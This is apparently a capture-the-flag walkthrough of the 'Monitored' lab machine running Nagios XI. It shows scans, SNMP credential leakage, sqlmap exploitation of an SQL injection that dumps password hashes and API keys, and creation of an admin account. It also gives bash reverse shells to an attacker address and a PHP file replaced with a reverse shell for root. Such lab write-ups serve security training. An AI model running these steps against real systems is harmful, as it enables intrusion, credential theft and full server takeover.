Monitored

Information Gathering

Port and Service

Nmap scan report for 10.10.11.248
Host is up (0.029s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
|   256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_  256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp   open  http       Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.56 ((Debian))
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after:  2297-08-25T21:46:55
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Nagios XI
|_ssl-date: TLS randomness does not represent time
5667/tcp open  tcpwrapped
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel





┌──(kali㉿kali)-[~/ctf/linux/monitored]
└─$ sudo nmap -sU 10.10.11.248 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 16:33 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:07 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 10.10.11.248
Host is up (0.028s latency).
Not shown: 989 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
123/udp   open   ntp
161/udp   open   snmp
518/udp   closed ntalk
3130/udp  closed squid-ipc
17605/udp closed unknown
20003/udp closed commtact-https
20919/udp closed unknown
21261/udp closed unknown
41774/udp closed unknown
43370/udp closed unknown
49178/udp closed unknown

SNMP

snmpbulwalk 10.10.11.248 -v 2c -c public
[--SNIP--]
iso.3.6.1.2.1.25.4.2.1.5.1426 = STRING: "-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.1427 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"

Initial Access

https://nagios.monitored.htb/nagiosxi/login.php

svc:XjH7VCehowpR1xZB

https://support.nagios.com/forum/viewtopic.php?f=16&t=58783

┌──(kali㉿kali)-[~/ctf/monitored]
└─$ curl "https://nagios.monitored.htb/nagiosxi/api/v1/authenticate" -k
{"error":"You can only use POST with authenticate."}

┌──(kali㉿kali)-[~/ctf/monitored]
└─$ curl -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/authenticate" -k --data "username=svc&password=XjH7VCehowpR1xZB"
{"username":"svc","user_id":"2","auth_token":"2d140381cfee058e60b5f7fb9e2da0e7583e7b18","valid_min":5,"valid_until":"Mon, 12 May 2025 12:05:28 -0400"}

https://nagios.monitored.htb/nagiosxi/login.php?token=2d140381cfee058e60b5f7fb9e2da0e7583e7b18

                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/ctf/monitored]
└─$ curl -X POST -k "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" -H "Cookie: nagiosxi=cki6nb8lcmnc1rs75nehsrofh2;" --data "action=acknowledge_banner_message&id=*" 
    <p><pre>SQL Error [nagiosxi] : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '* and user_id = 2' at line 1</pre></p>
{"message":"Failed to acknowledge message.","msg_type":"error"}

┌──(kali㉿kali)-[~/ctf/monitored]
└─$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" -H "Cookie: nagiosxi=cki6nb8lcmnc1rs75nehsrofh2;" --data "action=acknowledge_banner_message&id=*"  --dbs --threads 10 --batch
[--SNIP--]
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1296 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=acknowledge_banner_message&id= (SELECT 4519 FROM(SELECT COUNT(*),CONCAT(0x71707a7a71,(SELECT (ELT(4519=4519,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[23:41:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:41:19] [INFO] fetching database names
[23:41:19] [INFO] starting 2 threads
[23:41:20] [INFO] retrieved: 'information_schema'
[23:41:20] [INFO] retrieved: 'nagiosxi'
available databases [2]:
[*] information_schema
[*] nagiosxi

┌──(kali㉿kali)-[~/ctf/monitored]
└─$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" -H "Cookie: nagiosxi=cki6nb8lcmnc1rs75nehsrofh2;" --data "action=acknowledge_banner_message&id=*" -D nagiosxi -T xi_users  --dump --threads 10 --batch 
[--SNIP--]
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email               | name                 | api_key                                                          | enabled | password                                                     | username    | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket                                                   | last_edited_by | login_attempts | last_password_change |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1       | [email protected] | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1       | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0          | 1701931372 | 1           | 1701427555  | 0            | 0            | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0                                 | 5              | 0              | 1701427555           |
| 2       | [email protected]   | svc                  | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0       | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc         | 1          | 1699724476 | 1           | 1699728200  | 1699634403   | 1747065861   | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1              | 7              | 1699697433           |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+

┌──(kali㉿kali)-[~/ctf/monitored]
└─$ curl -k -X POST "http://nagios.monitored.htb/nagiosxi/api/v1/system/user&apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" --data "name=yha&username=yha&password=Password1&[email protected]&auth_level=admin"
{"success":"User account yha was added successfully!","user_id":6}

Configure > Core Config Manager > Commands

bash -c 'bash -i >& /dev/tcp/10.10.16.20/80 0>&1'

Privileges Escalation

https://github.com/Neo-XeD/CVE-2024-33775

<?php
//
// Dashlet Helper Functions
// Copyright (c) 2008-2018 Nagios Enterprises, LLC and others.
//

require_once(dirname(__FILE__) . '/../common.inc.php');
system('bash -c "/bin/bash -i >& /dev/tcp/10.10.16.20/80 0>&1"');

cd /usr/local/nagiosxi/html/includes/dashlets
mv dashlethelper.inc.php dashlethelper.inc.php.bak
wget http://10.10.16.20:8000/dashlethelper.inc.php
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

PreviousMedium NextSolidState

Last updated 7 months ago